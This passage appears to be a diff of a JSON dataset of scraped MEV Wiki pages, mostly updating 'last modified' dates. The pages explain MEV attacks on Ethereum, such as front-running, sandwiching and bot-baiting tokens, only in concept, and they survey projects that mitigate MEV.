Snapshot of Extracted MEV on 28 Sep 2021 from Flashbots It is estimated that more than $727M of MEV has been extracted since 1st January 2020. Snapshot of Extracted MEV Split on 28 Sep 2021 from Flashbots The majority of extracted MEV tend to be from Arbitrage opportunities on various AMMs , with a large percentage of income going to searchers, bots & participants in profit sharing MEV infrastructures (eg. Flashbot's MEV-GETH) Another useful tracker for gas consumption of back-running bots: Dune Analytics provides very detailed statistics on this worsening MEV situation. Link: According to https://research.paradigm.xyz/MEV Next Resource List Last modified 1yr ago", + "body": "Introduction Welcome to the MEV Wiki. Introduction This is a public resource for learning about MEV (Maximal Extractable Value). We cover a range of topics including the key concepts, research on this the topic, different approaches to tackling this issue by various projects out there. Find any errors or wants to share your opinions? See how you can contribute here . What is MEV? Maximal (formerly \"miner\" in the context of Proof of Work) extractable value (MEV) refers to the maximum value that can be extracted from block production in excess of the standard block reward and gas fees by censoring and/or changing the order of transactions in a block. When someone sends a transaction in the blockchain, there is a delay between the time when the transaction is broadcasted to the network and when it is actually mined into a block. During this period, transactions sit in a pending transaction pool called the mempool where contents are visible to everyone. Arbitrageurs and miners can monitor the mempool and find opportunities to maximize their own profits e.g. by frontrunning transactions. If a front-runner is a miner, they can also reorder or even censor transactions. MEV income can also be shared with non miners & traders who participate in some profit sharing schemes within the category of FaaS/MEVA . Why does this matter ? MEV can harm users MEV is an invisible tax that miners can collect from users. MEV can destabilize Ethereum If block rewards are small enough compared to MEV, it can be rational for miners to destabilize consensus by reordering or censoring transactions. Just how bad is the problem? You can use the Flashbots Dashboard to track Extracted MEV to better assess this worsening trend realtime. Snapshot of Extracted MEV on 28 Sep 2021 from Flashbots It is estimated that more than $727M of MEV has been extracted since 1st January 2020. Snapshot of Extracted MEV Split on 28 Sep 2021 from Flashbots The majority of extracted MEV tend to be from Arbitrage opportunities on various AMMs , with a large percentage of income going to searchers, bots & participants in profit sharing MEV infrastructures (eg. Flashbot's MEV-GETH) Another useful tracker for gas consumption of back-running bots: Dune Analytics provides very detailed statistics on this worsening MEV situation. Link: According to https://research.paradigm.xyz/MEV Next Resource List Last modified 2yr ago", "labels": [ "Documentation" ] @@ -450,7 +450,7 @@ { "title": "Attack Examples", "html_url": "https://www.mev.wiki/attack-examples", - "body": "Attack Examples Some example of attacks. Front-running Sandwich attack Back-running Liquidations Time bandit attack Uncle bandit attack Previous Transaction Ordering Next Front-running Last modified 1yr ago", + "body": "Attack Examples Some example of attacks. Front-running Sandwich attack Back-running Liquidations Time bandit attack Uncle bandit attack Previous Transaction Ordering Next Front-running Last modified 2yr ago", "labels": [ "Documentation" ] @@ -458,7 +458,7 @@ { "title": "Attempts to trick the bots", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots", - "body": "Attempts to trick the bots What are the ways some have come up with to trick bots? Salmonella Kattana Other attempts Previous Uncle bandit attack Next Salmonella Last modified 1yr ago", + "body": "Attempts to trick the bots What are the ways some have come up with to trick bots? Salmonella Kattana Other attempts Previous Uncle bandit attack Next Salmonella Last modified 2yr ago", "labels": [ "Documentation" ] @@ -466,7 +466,7 @@ { "title": "Contributions", "html_url": "https://www.mev.wiki/contributions", - "body": "Contributions BUIDL with MEV Wiki If you would like to contribute to this Wiki on MEV knowledge, please click the \"Edit on Github\" button on any page. Then create a Github pull request to suggest your changes. This wiki is maintained & sponsored by Automata Network . If you would like to become a contributor, please join Automata Discord Server . Previous Miscellaneous Last modified 1yr ago", + "body": "Contributions BUIDL with MEV Wiki If you would like to contribute to this Wiki on MEV knowledge, please click the \"Edit on Github\" button on any page. Then create a Github pull request to suggest your changes. This wiki is maintained & sponsored by Automata Network . If you would like to become a contributor, please join Automata Discord Server . Previous Miscellaneous Last modified 2yr ago", "labels": [ "Documentation" ] @@ -474,7 +474,7 @@ { "title": "Miscellaneous", "html_url": "https://www.mev.wiki/miscellaneous", - "body": "Miscellaneous What Happens when Ethereum moves to Proof-of-Stake? The move from PoW to PoS consensus means the Ethereum network becomes secured by a set validators, who stake their ETH and vote on consensus, as opposed to miners who run mining equipment to solve for the proof of work. This change of consensus is set to happen likely some time in 2021. Some have suggested that this means Miner Extractable Value will become Validator Extractable Value. This is an ongoing discussion and you can follow this here: Link: https://hackmd.io/@flashbots/ryuH4gn7d From Paradigm's piece \"On Staking Pools and Staking Derivatives\" - Staking pools and their staking derivatives are subject to similar market realities as MEV extraction, in the sense that their existence is inevitable. Institutional staking pools (e.g. exchanges) may have social and reputational constraints that prevent them from extracting certain forms of MEV. This allows smaller staking firms and decentralized pools without these constraints to provide higher returns for their stakers. This could turn the decentralization premium for using a decentralized staking pool into a decentralization discount. Link: https://research.paradigm.xyz/staking Other Academic Papers Tesseract Tesseract proposes a front-running resistant exchange relying on Intel SGX as a trusted execution environment. Link: https://eprint.iacr.org/2017/1153.pdf Calypso Enables a blockchain to hold and manage secrets on-chain with the convenient property that it is able to protect against front-running. Link: https://eprint.iacr.org/2018/209.pdf Previous B.Protocol Next Contributions Last modified 1yr ago", + "body": "Miscellaneous What Happens when Ethereum moves to Proof-of-Stake? The move from PoW to PoS consensus means the Ethereum network becomes secured by a set validators, who stake their ETH and vote on consensus, as opposed to miners who run mining equipment to solve for the proof of work. This change of consensus is set to happen likely some time in 2021. Some have suggested that this means Miner Extractable Value will become Validator Extractable Value. This is an ongoing discussion and you can follow this here: Link: https://hackmd.io/@flashbots/ryuH4gn7d From Paradigm's piece \"On Staking Pools and Staking Derivatives\" - Staking pools and their staking derivatives are subject to similar market realities as MEV extraction, in the sense that their existence is inevitable. Institutional staking pools (e.g. exchanges) may have social and reputational constraints that prevent them from extracting certain forms of MEV. This allows smaller staking firms and decentralized pools without these constraints to provide higher returns for their stakers. This could turn the decentralization premium for using a decentralized staking pool into a decentralization discount. Link: https://research.paradigm.xyz/staking Other Academic Papers Tesseract Tesseract proposes a front-running resistant exchange relying on Intel SGX as a trusted execution environment. Link: https://eprint.iacr.org/2017/1153.pdf Calypso Enables a blockchain to hold and manage secrets on-chain with the convenient property that it is able to protect against front-running. Link: https://eprint.iacr.org/2018/209.pdf Previous B.Protocol Next Contributions Last modified 2yr ago", "labels": [ "Documentation" ] @@ -482,7 +482,7 @@ { "title": "Resource List", "html_url": "https://www.mev.wiki/resource-list", - "body": "Resource List Links Name Type What Is Miner-Extractable Value (MEV)? Article Miners, Front-Running-as-a-Service Is Theft Article MEV and Me Article Ethereum is a Dark Forest Article Escaping the Dark Forest Article Ethereum Blockspace: Who Gets What and Why Article The fastest draw on the Blockchain: Ethereum Backrunning Article Security of Interoperability Presentation Gas Wars: Understanding Ethereum's Mempool & Miner Extractable Value Podcast Smart Contract Security - Incentives Beyond the Launch by Phil Daian (Devcon4) Video Enter the Dark Forest: the terrifying world of MEV and Flash bots Video Frontrunning in Decentralized Exchanges, Miner Extractable Value, and Consensus Instability Video How To Get Front-Run on Ethereum mainnet Video Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges Research Paper Quantifying Blockchain Extractable Value: How dark is the forest? Research Paper High-Frequency Trading on Decentralized On-Chain Exchanges Research Paper Frontrunner Jones and the Raiders of the Dark Forest: An Empirical Study of Frontrunning on the Ethereum Blockchain Research Paper Previous Introduction Next Terms and Concepts Last modified 1yr ago", + "body": "Resource List Links Name Type What Is Miner-Extractable Value (MEV)? Article Miners, Front-Running-as-a-Service Is Theft Article MEV and Me Article Ethereum is a Dark Forest Article Escaping the Dark Forest Article Ethereum Blockspace: Who Gets What and Why Article The fastest draw on the Blockchain: Ethereum Backrunning Article Security of Interoperability Presentation Gas Wars: Understanding Ethereum's Mempool & Miner Extractable Value Podcast Smart Contract Security - Incentives Beyond the Launch by Phil Daian (Devcon4) Video Enter the Dark Forest: the terrifying world of MEV and Flash bots Video Frontrunning in Decentralized Exchanges, Miner Extractable Value, and Consensus Instability Video How To Get Front-Run on Ethereum mainnet Video Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges Research Paper Quantifying Blockchain Extractable Value: How dark is the forest? Research Paper High-Frequency Trading on Decentralized On-Chain Exchanges Research Paper Frontrunner Jones and the Raiders of the Dark Forest: An Empirical Study of Frontrunning on the Ethereum Blockchain Research Paper Previous Introduction Next Terms and Concepts Last modified 2yr ago", "labels": [ "Documentation" ] @@ -490,7 +490,7 @@ { "title": "Solutions", "html_url": "https://www.mev.wiki/solutions", - "body": "Solutions Different approaches to tackling the MEV problem There are largely 2 schools of thought when it comes to approaching the MEV problem 1. Offense - MEV is here to stay so let's find a way to extract and democratize it. 2. Defense - MEV is bad so let's try to prevent it. Projects like Automata Network are in the Defense camp where the solution Conveyor ingests transactions and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. To further explain, we have put different approaches into 3 categories: Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEV Minimization Other solutions Previous Other attempts Next Front-running as a Service (FaaS) or MEV Auctions (MEVA) Last modified 1yr ago", + "body": "Solutions Different approaches to tackling the MEV problem There are largely 2 schools of thought when it comes to approaching the MEV problem 1. Offense - MEV is here to stay so let's find a way to extract and democratize it. 2. Defense - MEV is bad so let's try to prevent it. Projects like Automata Network are in the Defense camp where the solution Conveyor ingests transactions and outputs transactions in a determined order. This creates a front-running-free zone that removes the chaos of transaction reordering. To further explain, we have put different approaches into 3 categories: Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEV Minimization Other solutions Previous Other attempts Next Front-running as a Service (FaaS) or MEV Auctions (MEVA) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -498,7 +498,7 @@ { "title": "Terms and Concepts", "html_url": "https://www.mev.wiki/terms-and-concepts", - "body": "Terms and Concepts Exploring the main concepts involving MEV. DeFi Automated Market Maker Arbitrage Lending Platforms Slippage Liquidations Priority Gas Auctions Transaction Ordering Previous Resource List Next DeFi Last modified 1yr ago", + "body": "Terms and Concepts Exploring the main concepts involving MEV. DeFi Automated Market Maker Arbitrage Lending Platforms Slippage Liquidations Priority Gas Auctions Transaction Ordering Previous Resource List Next DeFi Last modified 2yr ago", "labels": [ "Documentation" ] @@ -506,7 +506,7 @@ { "title": "Back-running", "html_url": "https://www.mev.wiki/attack-examples/back-running", - "body": "Back-running What is back-running? Back-running occurs when a transaction sender wishes to have their transaction ordered immediately after some unconfirmed \"target transaction\". Example: A back-running bot that back-runs new token listings. Bot monitors the Ethereum mempool for new pairs being created on Uniswap. If it finds a new pair the bot places a buy transaction immediately behind the initial liquidity. The bot swoops in and buys as many tokens as possible (but not all of them as there needs to be an opportunity for others to buy tokens as well).The bot then waits for the price to go up as other traders buy the token from Uniswap and proceeds to sell back the tokens at a higher price. The key in this strategy is to be the first to buy tokens, but only after the token has been launched . In order to maximise their chances of being mined immediately after their target, a typical backrunner will send many identical transactions, with gas price identical to that of the target transaction, sometimes from different accounts. 1. https://amanusk.medium.com/the-fastest-draw-on-the-blockchain-bzrx-example-6bd19fabdbe1 Previous Sandwich attack Next Liquidations Last modified 1yr ago", + "body": "Back-running What is back-running? Back-running occurs when a transaction sender wishes to have their transaction ordered immediately after some unconfirmed \"target transaction\". Example: A back-running bot that back-runs new token listings. Bot monitors the Ethereum mempool for new pairs being created on Uniswap. If it finds a new pair the bot places a buy transaction immediately behind the initial liquidity. The bot swoops in and buys as many tokens as possible (but not all of them as there needs to be an opportunity for others to buy tokens as well).The bot then waits for the price to go up as other traders buy the token from Uniswap and proceeds to sell back the tokens at a higher price. The key in this strategy is to be the first to buy tokens, but only after the token has been launched . In order to maximise their chances of being mined immediately after their target, a typical backrunner will send many identical transactions, with gas price identical to that of the target transaction, sometimes from different accounts. 1. https://amanusk.medium.com/the-fastest-draw-on-the-blockchain-bzrx-example-6bd19fabdbe1 Previous Sandwich attack Next Liquidations Last modified 2yr ago", "labels": [ "Documentation" ] @@ -522,7 +522,7 @@ { "title": "Liquidations", "html_url": "https://www.mev.wiki/attack-examples/liquidations", - "body": "Liquidations How are liquidations exploited? Back-running strategies also apply to liquidations whereby a transaction sender wishes to be the first to liquidate a loan right after a price oracle update (which will allow liquidation to be triggered). Fixed spread liquidation used by Compound, Aave, and dYdX allows a liquidator to purchase collateral at a fixed discount when repaying debt. Strategy 1 Strategy 2 A detects a liquidation opportunity at block B (i.e., after the execution of B). A then issues a liquidation transaction T, which is expected to be mined in the next block B +1. A attempts to destructively front-run other competing liquidators by setting high transaction fees for his liquidation transaction T. A observes a transaction T, which will create a liquidation opportunity (e.g., an oracle price update transaction which will render a collateralized debt liquidatable). A then back-runs T with a liquidation transaction TA to avoid the transaction fee bidding competition. The auction liquidation allows a liquidator to start an auction that lasts for a pre-configured period (e.g., 6 hours). Competing liquidators can engage and bid on the collateral price. Previous Back-running Next Time bandit attack Last modified 1yr ago", + "body": "Liquidations How are liquidations exploited? Back-running strategies also apply to liquidations whereby a transaction sender wishes to be the first to liquidate a loan right after a price oracle update (which will allow liquidation to be triggered). Fixed spread liquidation used by Compound, Aave, and dYdX allows a liquidator to purchase collateral at a fixed discount when repaying debt. Strategy 1 Strategy 2 A detects a liquidation opportunity at block B (i.e., after the execution of B). A then issues a liquidation transaction T, which is expected to be mined in the next block B +1. A attempts to destructively front-run other competing liquidators by setting high transaction fees for his liquidation transaction T. A observes a transaction T, which will create a liquidation opportunity (e.g., an oracle price update transaction which will render a collateralized debt liquidatable). A then back-runs T with a liquidation transaction TA to avoid the transaction fee bidding competition. The auction liquidation allows a liquidator to start an auction that lasts for a pre-configured period (e.g., 6 hours). Competing liquidators can engage and bid on the collateral price. Previous Back-running Next Time bandit attack Last modified 2yr ago", "labels": [ "Documentation" ] @@ -546,7 +546,7 @@ { "title": "Uncle bandit attack", "html_url": "https://www.mev.wiki/attack-examples/uncle-bandit-attack", - "body": "Uncle bandit attack What is a uncle bandit attack? Bundles are groups of transactions Flashbots users submit. Those transactions must be included in the order submitted, and either the whole bundle is included, or nothing is. A bundle should never be split up. Robert Miller found that for a specific bundle, only the \"Buy\" part of a sandwich bundle submitted had landed on-chain, and right after that Buy someone else had inserted a 7 gas transaction that arbitraged it. How? In Ethereum occasionally two blocks are mined at roughly the same time, and only one block can be added to the chain. The other gets \"uncled\" or orphaned. Anyone can access transactions in an uncled block and some of the transactions may not have ended up in the non-uncled block. In a way some transactions end up in a sort of mempool like state: they are now public as a part of the uncled block and perhaps still valid too. A Sandwicher's bundle was included in an uncled block. An attacker saw this, grabbed only the Buy part of the Sandwich, threw away the rest, and added an arbitrage after. The attacker then submitted that as a bundle, which was then mined. Instead of seeing something late in time and rewinding it (time-bandit attack), the uncle bandit attack is when an attacker sees something in an uncle and brings it forward. This also shows that attacks extend beyond the mempool and into uncled blocks as well. https://twitter.com/bertcmiller/status/1382673587715342339?s=20 Previous Time bandit attack Next Attempts to trick the bots Last modified 1yr ago", + "body": "Uncle bandit attack What is a uncle bandit attack? Bundles are groups of transactions Flashbots users submit. Those transactions must be included in the order submitted, and either the whole bundle is included, or nothing is. A bundle should never be split up. Robert Miller found that for a specific bundle, only the \"Buy\" part of a sandwich bundle submitted had landed on-chain, and right after that Buy someone else had inserted a 7 gas transaction that arbitraged it. How? In Ethereum occasionally two blocks are mined at roughly the same time, and only one block can be added to the chain. The other gets \"uncled\" or orphaned. Anyone can access transactions in an uncled block and some of the transactions may not have ended up in the non-uncled block. In a way some transactions end up in a sort of mempool like state: they are now public as a part of the uncled block and perhaps still valid too. A Sandwicher's bundle was included in an uncled block. An attacker saw this, grabbed only the Buy part of the Sandwich, threw away the rest, and added an arbitrage after. The attacker then submitted that as a bundle, which was then mined. Instead of seeing something late in time and rewinding it (time-bandit attack), the uncle bandit attack is when an attacker sees something in an uncle and brings it forward. This also shows that attacks extend beyond the mempool and into uncled blocks as well. https://twitter.com/bertcmiller/status/1382673587715342339?s=20 Previous Time bandit attack Next Attempts to trick the bots Last modified 2yr ago", "labels": [ "Documentation" ] @@ -554,7 +554,7 @@ { "title": "Kattana", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots/kattana", - "body": "Kattana What is Kattana? The Kattana team included a trap for front-running bots during their token listing. There is a line in the code that disallows the front-runner from selling all tokens. So a front-runner paid 68 ETH to the miner and ended up with tokens he wasn't able to sell. Link: https://twitter.com/SiegeRhino2/status/1381035640989626369?s=20 Previous Salmonella Next Other attempts Last modified 1yr ago", + "body": "Kattana What is Kattana? The Kattana team included a trap for front-running bots during their token listing. There is a line in the code that disallows the front-runner from selling all tokens. So a front-runner paid 68 ETH to the miner and ended up with tokens he wasn't able to sell. Link: https://twitter.com/SiegeRhino2/status/1381035640989626369?s=20 Previous Salmonella Next Other attempts Last modified 2yr ago", "labels": [ "Documentation" ] @@ -562,7 +562,7 @@ { "title": "Other attempts", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots/other-attempts-to-trick-the-bot", - "body": "Other attempts What are the other attempts to trick the bot? Link: https://twitter.com/bertcmiller/status/1381296074086830091?s=20 Background Instead of users paying transaction fees via gas prices, Flashbots users pay fees via a smart contract call which transfers ETH to a miner. Miners receive bundles of transaction from users and include the bundle that pays them the most. Users love this because they only pay for transactions that are included and they can determine the fee that they are going to pay. Sandwich bots watch the mempool for users buying on DEXes and sandwich them: running the price up before the victim buys and dumping after for a profit. Those 3 txs (buy, victim transaction, sell) make up a bundle. Note the Sandwich sell transaction contains the smart contract payment to the miner. It's important that payment goes to the miner on the sell transaction! That should only happen after the bot has secured profit from selling the tokens bought in their front-run. If that sell fails then there is no payment to the miner, and thus their bundle shouldn't be included To be even more secure, bots will simulate their transactions on local infrastructure. Bots won't send transactions unless the simulation goes well. Paying transaction fees only on the sell transaction of a sandwich should defend against this. No profit, no payment. Simulation vs Reality Some really smart people found weaknesses among all of these defenses. The first defense was that simulation was done with an ERC20 transfer function that checked to see if the block was a mined by Flashbots' miners, and if so it transfers way less out. Local simulations look fine but do not work in production. The second defense - Payment only on a sell transaction Again: Sandwich bots make miner payment conditional on profit. That was broken by making the ERC20 token pay the miner. Thus even with the Sandwich bot sell failing, the miner would still get paid! Here's what actually happened: Sandwich bot gets baited and buys 100 ETH of the poisonous token. Poisonous token owner's bait triggers custom transfer function, which pays 0.1 ETH to the miner Sandwich bot's sell doesn't work because of the poisonous token. As the sandwich bot submitted these three transactions in a bundle all three were included: the successful buy, the bait, and the failed sell. The poisonous ERC20's payment via the custom transfer was what incentivized a miner to include it! It is estimated that the first person to do this made about 100 ETH. You can see the poisoned ERC20 Uniswap transactions here . From Victim to Predator One of their victims was one the most successful Flashbots bot operators, and they immediately sprung into action. In a short period of time the victim turned into an apex predator. They launched a similar but slightly different ERC20 (YOLOchain), and ended up successfully baiting many more sandwichers. They made 300 ETH doing so! Previous Kattana Next Solutions Last modified 1yr ago", + "body": "Other attempts What are the other attempts to trick the bot? Link: https://twitter.com/bertcmiller/status/1381296074086830091?s=20 Background Instead of users paying transaction fees via gas prices, Flashbots users pay fees via a smart contract call which transfers ETH to a miner. Miners receive bundles of transaction from users and include the bundle that pays them the most. Users love this because they only pay for transactions that are included and they can determine the fee that they are going to pay. Sandwich bots watch the mempool for users buying on DEXes and sandwich them: running the price up before the victim buys and dumping after for a profit. Those 3 txs (buy, victim transaction, sell) make up a bundle. Note the Sandwich sell transaction contains the smart contract payment to the miner. It's important that payment goes to the miner on the sell transaction! That should only happen after the bot has secured profit from selling the tokens bought in their front-run. If that sell fails then there is no payment to the miner, and thus their bundle shouldn't be included To be even more secure, bots will simulate their transactions on local infrastructure. Bots won't send transactions unless the simulation goes well. Paying transaction fees only on the sell transaction of a sandwich should defend against this. No profit, no payment. Simulation vs Reality Some really smart people found weaknesses among all of these defenses. The first defense was that simulation was done with an ERC20 transfer function that checked to see if the block was a mined by Flashbots' miners, and if so it transfers way less out. Local simulations look fine but do not work in production. The second defense - Payment only on a sell transaction Again: Sandwich bots make miner payment conditional on profit. That was broken by making the ERC20 token pay the miner. Thus even with the Sandwich bot sell failing, the miner would still get paid! Here's what actually happened: Sandwich bot gets baited and buys 100 ETH of the poisonous token. Poisonous token owner's bait triggers custom transfer function, which pays 0.1 ETH to the miner Sandwich bot's sell doesn't work because of the poisonous token. As the sandwich bot submitted these three transactions in a bundle all three were included: the successful buy, the bait, and the failed sell. The poisonous ERC20's payment via the custom transfer was what incentivized a miner to include it! It is estimated that the first person to do this made about 100 ETH. You can see the poisoned ERC20 Uniswap transactions here . From Victim to Predator One of their victims was one the most successful Flashbots bot operators, and they immediately sprung into action. In a short period of time the victim turned into an apex predator. They launched a similar but slightly different ERC20 (YOLOchain), and ended up successfully baiting many more sandwichers. They made 300 ETH doing so! Previous Kattana Next Solutions Last modified 2yr ago", "labels": [ "Documentation" ] @@ -570,7 +570,7 @@ { "title": "Salmonella", "html_url": "https://www.mev.wiki/attempts-to-trick-the-bots/salmonella", - "body": "Salmonella What is Salmonella? Salmonella intentionally exploits the generalised nature of front-running setups. The goal of sandwich trading is to exploit the slippage of unintended victims, so this strategy turns the tables on the exploiters. Its a regular ERC20 token, which behaves exactly like any other ERC20 token in normal use-cases. However, it has some special logic to detect when anyone other than the specified owner is transacting it, and in these situations it only returns 10% of the specified amount - despite emitting event logs which match a trade of the full amount. Link: https://github.com/Defi-Cartel/salmonella Previous Attempts to trick the bots Next Kattana Last modified 1yr ago", + "body": "Salmonella What is Salmonella? Salmonella intentionally exploits the generalised nature of front-running setups. The goal of sandwich trading is to exploit the slippage of unintended victims, so this strategy turns the tables on the exploiters. Its a regular ERC20 token, which behaves exactly like any other ERC20 token in normal use-cases. However, it has some special logic to detect when anyone other than the specified owner is transacting it, and in these situations it only returns 10% of the specified amount - despite emitting event logs which match a trade of the full amount. Link: https://github.com/Defi-Cartel/salmonella Previous Attempts to trick the bots Next Kattana Last modified 2yr ago", "labels": [ "Documentation" ] @@ -578,7 +578,7 @@ { "title": "Front-running as a Service (FaaS) or MEV Auctions (MEVA)", "html_url": "https://www.mev.wiki/solutions/faas-or-meva", - "body": "Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEVA and FaaS solutions. In a FaaS or MEVA system, MEV is extracted in a variety of ways such as miners auctioning off the right to front-run users. 'Centralizing MEV extraction is good because it quarantines a revenue stream that could otherwise drive centralization in other sectors.' Vitalik Buterin 'In this article, Im going to go deep into my personal arguments for why extracting MEV in cryptocurrencies isnt like theft, why it is a critical metric for network security in any distributed system secured by economic incentives (yes, including centralized ones), and what we should do about MEV in the next 3-5 years as a community.' Phil Daian, co-author of Flash Boys 2.0 See the various solutions: Private Transactions BackRunMe by bloXroute Flashbots mistX by alchemist KeeperDAO EDEN Network (ArcherSwap) Optimism MiningDAO BackBone Cabal Previous Solutions Next Private Transactions Last modified 1yr ago", + "body": "Front-running as a Service (FaaS) or MEV Auctions (MEVA) MEVA and FaaS solutions. In a FaaS or MEVA system, MEV is extracted in a variety of ways such as miners auctioning off the right to front-run users. 'Centralizing MEV extraction is good because it quarantines a revenue stream that could otherwise drive centralization in other sectors.' Vitalik Buterin 'In this article, Im going to go deep into my personal arguments for why extracting MEV in cryptocurrencies isnt like theft, why it is a critical metric for network security in any distributed system secured by economic incentives (yes, including centralized ones), and what we should do about MEV in the next 3-5 years as a community.' Phil Daian, co-author of Flash Boys 2.0 See the various solutions: Private Transactions BackRunMe by bloXroute Flashbots mistX by alchemist KeeperDAO EDEN Network (ArcherSwap) Optimism MiningDAO BackBone Cabal Previous Solutions Next Private Transactions Last modified 2yr ago", "labels": [ "Documentation" ] @@ -586,7 +586,7 @@ { "title": "MEV Minimization", "html_url": "https://www.mev.wiki/solutions/mev-minimization", - "body": "MEV Minimization MEV minimization and prevention solutions. Here are various solutions in MEV minimization: Conveyor (Automata Network) SecretSwap (Secret Network) Fair sequencing service (Chainlink) Arbitrum (Offchain Labs) Vega protocol CowSwap Veedo (StarkWare) LibSubmarine Sikka Shutter Network Previous BackBone Cabal Next Conveyor (Automata Network) Last modified 1yr ago", + "body": "MEV Minimization MEV minimization and prevention solutions. Here are various solutions in MEV minimization: Conveyor (Automata Network) SecretSwap (Secret Network) Fair sequencing service (Chainlink) Arbitrum (Offchain Labs) Vega protocol CowSwap Veedo (StarkWare) LibSubmarine Sikka Shutter Network Previous BackBone Cabal Next Conveyor (Automata Network) Last modified 2yr ago", "labels": [ "Documentation" ] @@ -594,7 +594,7 @@ { "title": "Other solutions", "html_url": "https://www.mev.wiki/solutions/others", - "body": "Other solutions Other ways to tackle MEV. Here are the list of other solutions: B.Protocol Previous Shutter Network Next B.Protocol Last modified 1yr ago", + "body": "Other solutions Other ways to tackle MEV. Here are the list of other solutions: B.Protocol Previous Shutter Network Next B.Protocol Last modified 2yr ago", "labels": [ "Documentation" ] @@ -610,7 +610,7 @@ { "title": "Automated Market Maker", "html_url": "https://www.mev.wiki/terms-and-concepts/automated-market-maker", - "body": "Automated Market Maker What is an AMM? A type of Decentralised Exchange. Contrary to traditional limit order-book-based exchanges (which maintain a list of bids and asks for an asset pair), AMM exchanges maintain a pool of capital (a liquidity pool) with at least two assets. A smart contract governs the rules by which traders can purchase and sell assets from the liquidity pool. The most common AMM mechanism is a constant product AMM, where the product of an asset X and asset Y in a pool have to abide by a constant K. Examples of AMM Exchanges include Uniswap , Sushiswap , Balancer . Previous DeFi Next Arbitrage Last modified 1yr ago", + "body": "Automated Market Maker What is an AMM? A type of Decentralised Exchange. Contrary to traditional limit order-book-based exchanges (which maintain a list of bids and asks for an asset pair), AMM exchanges maintain a pool of capital (a liquidity pool) with at least two assets. A smart contract governs the rules by which traders can purchase and sell assets from the liquidity pool. The most common AMM mechanism is a constant product AMM, where the product of an asset X and asset Y in a pool have to abide by a constant K. Examples of AMM Exchanges include Uniswap , Sushiswap , Balancer . Previous DeFi Next Arbitrage Last modified 2yr ago", "labels": [ "Documentation" ] @@ -618,7 +618,7 @@ { "title": "DeFi", "html_url": "https://www.mev.wiki/terms-and-concepts/defi", - "body": "DeFi What is DeFi? DeFi is a subset of finance-focused decentralized protocols that operate autonomously on blockchain-based smart contracts. The total value locked in DeFi amounts to >$50B USD . Link: https://defipulse.com/ Previous Terms and Concepts Next Automated Market Maker Last modified 1yr ago", + "body": "DeFi What is DeFi? DeFi is a subset of finance-focused decentralized protocols that operate autonomously on blockchain-based smart contracts. The total value locked in DeFi amounts to >$50B USD . Link: https://defipulse.com/ Previous Terms and Concepts Next Automated Market Maker Last modified 2yr ago", "labels": [ "Documentation" ] @@ -674,7 +674,7 @@ { "title": "BackBone Cabal", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/backbone-cabal", - "body": "BackBone Cabal BackBone Cabal BackBone Cabal is a strategy that aims to extract MEV from SushiSwap. Profits are redistributed back to users who submitted trades in the first place in the form of eliminating their transaction cost (up to 90%). YCabal creates a virtualized mempool (i.e. a MEV-relay network) that aggregates transactions (batching). Users are able to opt in and send transactions to YCabal and in return for not having to pay for gas for their transaction, YCabal batch processes it and takes the arbitrage profit. Risk by inventory price risk is carried by a Vault, where Vault depositers are returned the profit the YCabal realizes. Links: Website: https://backbonecabal.com/ Knowledge Base: https://backbone-kb.netlify.app/ SushiSwap Proposal: https://forum.sushiswapclassic.org/t/proposal-ycabal-mev-strategy/3159 Previous MiningDAO Next MEV Minimization Last modified 1yr ago", + "body": "BackBone Cabal BackBone Cabal BackBone Cabal is a strategy that aims to extract MEV from SushiSwap. Profits are redistributed back to users who submitted trades in the first place in the form of eliminating their transaction cost (up to 90%). YCabal creates a virtualized mempool (i.e. a MEV-relay network) that aggregates transactions (batching). Users are able to opt in and send transactions to YCabal and in return for not having to pay for gas for their transaction, YCabal batch processes it and takes the arbitrage profit. Risk by inventory price risk is carried by a Vault, where Vault depositers are returned the profit the YCabal realizes. Links: Website: https://backbonecabal.com/ Knowledge Base: https://backbone-kb.netlify.app/ SushiSwap Proposal: https://forum.sushiswapclassic.org/t/proposal-ycabal-mev-strategy/3159 Previous MiningDAO Next MEV Minimization Last modified 2yr ago", "labels": [ "Documentation" ] @@ -682,7 +682,7 @@ { "title": "BackRunMe by bloXroute", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/backrunme-by-bloxroute", - "body": "BackRunMe by bloXroute BackRunMe by bloXroute BackRunMe is a service that allows users to submit private transactions (e.g. protection against frontrunning and sandwich attacks) while allowing searchers to backrun the transaction via MEV IF it produces an arbitrage profit. If it doesn't generate an arbitrage profit it is processed as a regular private transaction. BackRunMe, gives a portion of this additional profit back to the user. How BackRunMe works. The profit sharing ratio is as follows: 50% to miners, 25% to users, 20%to searchers and 5% to bloXroute. Users can use MetaMask directly on BackRunMe to trade on Uniswap or Sushiswap. Links: https://backrunme.com/#/swap https://medium.com/bloxroute/there-is-light-in-the-dark-forest-2d7b77f4ca2d Previous Private Transactions Next Flashbots Last modified 1yr ago", + "body": "BackRunMe by bloXroute BackRunMe by bloXroute BackRunMe is a service that allows users to submit private transactions (e.g. protection against frontrunning and sandwich attacks) while allowing searchers to backrun the transaction via MEV IF it produces an arbitrage profit. If it doesn't generate an arbitrage profit it is processed as a regular private transaction. BackRunMe, gives a portion of this additional profit back to the user. How BackRunMe works. The profit sharing ratio is as follows: 50% to miners, 25% to users, 20%to searchers and 5% to bloXroute. Users can use MetaMask directly on BackRunMe to trade on Uniswap or Sushiswap. Links: https://backrunme.com/#/swap https://medium.com/bloxroute/there-is-light-in-the-dark-forest-2d7b77f4ca2d Previous Private Transactions Next Flashbots Last modified 2yr ago", "labels": [ "Documentation" ] @@ -690,7 +690,7 @@ { "title": "Flashbots", "html_url": "https://www.mev.wiki/solutions/faas-or-meva/flashbots", - "body": "Flashbots Flashbots Flashbots is a research and development organization formed to mitigate the negative externalities and existential risks posed by MEV. They aim to Democratize MEV Extraction through MEV-Geth, which enables a sealed-bid block space auction mechanism for communicating transaction order preference. ELI5 Link: https://twitter.com/_silto_/status/1381292907567722498 Flashbots created an ETH 